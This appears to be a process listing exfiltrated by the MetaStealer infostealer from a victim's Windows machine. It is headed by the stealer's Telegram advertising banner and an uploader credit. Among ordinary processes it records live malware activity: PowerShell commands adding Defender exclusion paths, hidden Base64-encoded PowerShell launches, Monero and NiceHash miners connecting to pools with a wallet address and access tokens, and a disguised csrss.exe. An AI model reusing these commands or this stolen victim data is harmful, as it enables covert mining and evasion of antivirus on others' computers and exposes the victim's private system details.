Process List

The document lists process information from a Windows system, including the process ID, name, and command line. There are many system processes like explorer.exe and svchost.exe as well as user applications like Discord and Internet Download Manager running.

Uploaded by blackcaliber44

***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 740, Name: csrss.exe, CommandLine:


===============
ID: 800, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 468, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1196, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 4176, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4156, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 3660, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 5128, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 5372, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 5804, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 5932, Name: igfxEM.exe, CommandLine: "C:\Windows\System32\DriverStore\
FileRepository\cui_dch.inf_amd64_38cfab2b652e4701\igfxEM.exe"
===============
ID: 6096, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 6620, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 6792, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 7012, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 6304, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 4596, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 6048, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 8152, Name: OneDrive.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 5840, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe"
===============
ID: 7232, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 8120, Name: Discord.exe, CommandLine: C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\ASUS\AppData\
Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-
annotation=ptype=crashpad-handler --database=C:\Users\ASUS\AppData\Roaming\discord\
Crashpad --url=https://sentry.io/api/146342/minidump/?
sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord
Inc." --annotation=_productName=Discord --annotation=_version=1.0.9012 --
annotation=plat=Win32 --annotation=prod=Electron --annotation=ver=22.3.2 --initial-
client-data=0x49c,0x480,0x414,0x498,0x410,0x85aef78,0x85aef88,0x85aef94
===============
ID: 7296, Name: IDMan.exe, CommandLine: "C:\Program Files (x86)\Internet Download
Manager\IDMan.exe" /onboot
===============
ID: 8352, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8580, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe" --type=gpu-process --user-data-dir="C:\Users\ASUS\AppData\
Roaming\discord" --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=1780 --field-trial-
handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
===============
ID: 8768, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-
data-dir="C:\Users\ASUS\AppData\Roaming\discord" --mojo-platform-channel-
handle=2200 --field-trial-
handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 9304, Name: RtkAudUService64.exe, CommandLine: C:\Windows\System32\
RtkAudUService64.exe -background
===============
ID: 8684, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe" --type=renderer --user-data-dir="C:\Users\ASUS\AppData\
Roaming\discord" --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\
Users\ASUS\AppData\Local\Discord\app-1.0.9012\resources\app.asar" --no-sandbox --
no-zygote --autoplay-policy=no-user-gesture-required --lang=en-US --device-scale-
factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-
client-id=5 --time-ticks-at-unix-epoch=-1681893985127383 --launch-time-
ticks=59915891 --mojo-platform-channel-handle=3476 --field-trial-
handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand --enable-node-leakage-in-renderers /prefetch:1
===============
ID: 10672, Name: java.exe, CommandLine: C:\Users\ASUS\AppData\Roaming\Java\jre8\
bin\java.exe --expose-gc C:\Users\ASUS\AppData\Roaming\Java\jre8\bin\java.exe:jnl
===============
ID: 11100, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -
ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
===============
ID: 9112, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-
1.0.9012\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --
lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\ASUS\AppData\
Roaming\discord" --mojo-platform-channel-handle=2648 --field-trial-
handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-
features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProces
s,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 10924, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup
===============
ID: 9092, Name: LockApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -
ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca
===============
ID: 392, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 2848, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 4888, Name: RtkUWP.exe, CommandLine: "C:\Program Files\WindowsApps\
RealtekSemiconductorCorp.RealtekAudioControl_1.1.137.0_x64__dt26b99r8h8gj\
RtkUWP.exe" -ServerName:App.AppX2vzv616czv2j97f46vn25b5ksjvhr8z1.mca
===============
ID: 2004, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 7996, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 5712, Name: wpscloudsvr.exe, CommandLine: "C:\Users\ASUS\AppData\Local\
Kingsoft\WPS Office\11.2.0.11516\office6\wpscloudsvr.exe" /wpscloudlaunch
/run_plugin /plugin_name=ktaskschdtool /plugin_entry=ktaskschdtool.dll
/task=wpsexternal /launchtask /ver=1.0 /start_from=task_external
===============
ID: 5012, Name: mstsca.exe, CommandLine: C:\Users\ASUS\AppData\Roaming\Microsoft\
Network\mstsca.exe
===============
ID: 6548, Name: wpscenter.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Kingsoft\
WPS Office\11.2.0.11516\office6/wpscenter.exe" Run -Entry=EntryPoint "C:\Users\
ASUS\AppData\Roaming\Kingsoft/wps/addons/pool/win-i386/kdocreminder_1.1.2021.65/
kdocreminder.dll"
===============
ID: 4712, Name: 3A56.exe, CommandLine: C:\Users\ASUS\AppData\Local\f46f4670-506e-
4b11-84f8-99261ddf6dc7\3A56.exe --Task
===============
ID: 8464, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 4756, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 8524, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 10396, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 4892, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 668, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 8344, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 11252, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 6764, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 4580, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 6588, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 2744, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\
v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5
vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 7360, Name: WBGRGV.exe, CommandLine: C:\ProgramData\portableWin\WBGRGV.exe
===============
ID: 9088, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 5584, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 8160, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 6148, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 1324, Name: koPamCs_vM7jHvyfackwRCVE.exe, CommandLine: "C:\Users\ASUS\Pictures\
Minor Policy\koPamCs_vM7jHvyfackwRCVE.exe"
===============
ID: 10920, Name: koPamCs_vM7jHvyfackwRCVE.exe, CommandLine: "C:\Users\ASUS\
Pictures\Minor Policy\koPamCs_vM7jHvyfackwRCVE.exe"
===============
ID: 6660, Name: lttZ9ZMSNstwv47LDDLSi0EM.exe, CommandLine: "C:\Users\ASUS\Pictures\
Minor Policy\lttZ9ZMSNstwv47LDDLSi0EM.exe"
===============
ID: 9872, Name: lttZ9ZMSNstwv47LDDLSi0EM.exe, CommandLine: "C:\Users\ASUS\Pictures\
Minor Policy\lttZ9ZMSNstwv47LDDLSi0EM.exe"
===============
ID: 1316, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 9568, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 5524, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929564397
===============
ID: 8308, Name: HxTsr.exe, CommandLine: "C:\Program Files\WindowsApps\
microsoft.windowscommunicationsapps_16005.14326.21374.0_x64__8wekyb3d8bbwe\
HxTsr.exe" -ServerName:Hx.IPC.Server
===============
ID: 9752, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 11124, Name: powershell.exe, CommandLine: C:\Windows\System32\
WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 5996, Name: powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\
v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 6596, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 9156, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 244, Name: wnb70KIsW65hvwPVbukgwPFK.exe, CommandLine: "C:\Users\ASUS\Pictures\
Minor Policy\wnb70KIsW65hvwPVbukgwPFK.exe"
===============
ID: 7892, Name: is-O532D.tmp, CommandLine: "C:\Users\ASUS\AppData\Local\Temp\is-
BEIKE.tmp\is-O532D.tmp" /SL4 $C02C6 "C:\Users\ASUS\Pictures\Minor Policy\
wnb70KIsW65hvwPVbukgwPFK.exe" 2562561 56320
===============
ID: 11468, Name: powershell.exe, CommandLine: C:\Windows\System32\
WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand
cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZAB
lAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 11964, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 13012, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 4172, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --restore-last-session
===============
ID: 6132, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\ASUS\
AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\ASUS\AppData\Local\Google\
Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --
annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --
annotation=ver=112.0.5615.122 --initial-client-
data=0xe8,0x188,0x1c4,0xe4,0x1c8,0x7ffafcdeaa60,0x7ffafcdeaa70,0x7ffafcdeaa80
===============
ID: 10716, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 5332, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 4560, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 5152, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAA
AAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-
platform-channel-handle=1900 --field-trial-
handle=1980,i,3186326931205788530,10113752326107017979,131072 /prefetch:2
===============
ID: 10016, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-
platform-channel-handle=2160 --field-trial-
handle=1980,i,3186326931205788530,10113752326107017979,131072 /prefetch:8
===============
ID: 4200, Name: wup.exe, CommandLine: C:\Users\ASUS\AppData\Local\Temp\csrss\wup\
xarch\wup.exe -o dxpools.net:40001 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
tls --nicehash -o dxpools.net:443 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
tls --nicehash -o dxpools.net:80 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --
nicehash --http-port 3433 --http-access-token 170aff50-3414-460e-ac6b-4ab10e102304
--randomx-wrmsr=-1
===============
ID: 12468, Name: csrss.exe, CommandLine: C:\Windows\rss\csrss.exe -hide 4200
